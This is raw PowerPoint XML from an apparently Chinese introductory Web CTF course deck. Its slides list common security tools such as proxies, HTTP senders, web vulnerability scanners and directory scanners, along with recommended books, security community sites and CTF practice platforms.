              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Proxy SwitchyOmega</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en" sz="2400" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>浏览器代理插件）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-432000">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0"/>
              <a:t>Postman</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>包发送</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>接收工具）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-432000">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Netsparker</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>AWVS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en" sz="2400" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>漏洞扫描）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-432000">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Kali</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en" sz="2400" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>woobuntu</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en" sz="2400" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>自带安全工具的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>发行版）</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:endParaRPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DC65920-AE23-F743-BEB7-15325996284E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="716280" y="1005840"/>
            <a:ext cx="5044440" cy="681725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800" b="1">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>七</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>、工具</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29121557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目录扫描（御剑、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>dirsearch</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98E3994C-7D31-C84F-A6D3-B78E95687CC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect b="4771"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2480186" y="1686031"/>
            <a:ext cx="7460227" cy="5171969"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41931325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Web CTF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>中的常用工具</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文件泄露（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> SensInfo Finder</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E289352-3CD5-2F44-91D6-2E8DCFDD5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166" y="1582710"/>
            <a:ext cx="8519594" cy="5275290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="109104303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练习</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 altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>https://web.ctflearn.com/grid/index.php</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="270483983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2000" cy="6871525"/>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8387" y="3455192"/>
            <a:ext cx="2841863" cy="3416332"/>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791510" y="3455192"/>
            <a:ext cx="2841863" cy="3416332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="PA_文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5095243" y="2378138"/>
            <a:ext cx="2001520" cy="939800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="4600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="17307F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>谢    谢</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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>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0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="12" dur="75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1+#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2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8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="2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所需知识</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CE3915F-2A63-1743-A167-096F6DE68D95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1403350" y="2394895"/>
            <a:ext cx="4898390" cy="2796407"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-432000">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>《</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>白帽子讲</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>安全</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>》</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-432000">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>《</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>前端黑客技术揭秘</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>》</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-432000">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>《</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Python</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>网络编程（第三版）</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>》</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-432000">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>《</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Python</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>高级编程</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>》</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-432000">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>《</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Effective Python》</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DC65920-AE23-F743-BEB7-15325996284E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="716280" y="1005840"/>
            <a:ext cx="5044440" cy="681725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800" b="1">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>八</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>、书和网站</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CA8D997-9785-1648-B9F9-98670A974F5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7095490" y="2394895"/>
            <a:ext cx="4898390" cy="2796407"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-432000">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Sec Wiki</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-432000">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>乌云网</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-432000">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400"/>
              <a:t>先知社区</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-432000">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400"/>
              <a:t>安全客</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-432000">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>推酷</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4408577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练习平台</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96E5BCEC-A924-8E4E-8156-BF6E5FA7873D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="934720" y="1234440"/>
            <a:ext cx="9245600" cy="1689052"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>实验吧：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-Hans" sz="2400" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.shiyanbar.com/ctf/practice</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en" altLang="zh-Hans" sz="2400" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ctflearn</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://ctflearn.com</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en" altLang="zh-Hans" sz="2400" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>jarvisoj</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>： </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.jarvisoj.com/</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="359587352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58520" y="187960"/>
            <a:ext cx="5367020" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>请求</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>响应流程</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400">
              <a:solidFill>
